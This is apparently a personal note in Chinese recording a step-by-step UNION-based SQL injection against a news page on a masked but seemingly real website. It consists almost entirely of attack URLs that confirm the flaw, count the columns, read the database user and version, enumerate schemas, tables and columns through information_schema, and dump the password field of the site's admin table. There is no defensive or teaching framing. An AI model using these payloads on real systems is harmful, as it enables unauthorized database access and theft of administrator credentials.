http://xxx.com/news_blank.php?id=296 and 1=1

http://xxxxx.com/news_blank.php?id=296+and+1=1

http://xxxxx.com/news_blank.php?id=296+and+1=2

确认是注入

http://xxxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,4,5,6,7,8,9,10,11–+

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,user(),5,6,7,version(),9,10,11–+

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name as char))),5,6,7,version(),9,10,11 from information_schema.schemata limit 1,2

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,version(),9,10,11 from information_schema.tables where table_schema=’hengdong’limit 0,1 查询表名

由于表名太多 所以用python写了个脚本

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,version(),9,10,11 from information_schema.columns where table_schema=’hengdong’and table_name=’hdwl_admin’limit 3,4 查询字段名

http://xxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwdas char))),5,6,7,version(),9,10,11 from hdwl_admin 查询字段的内容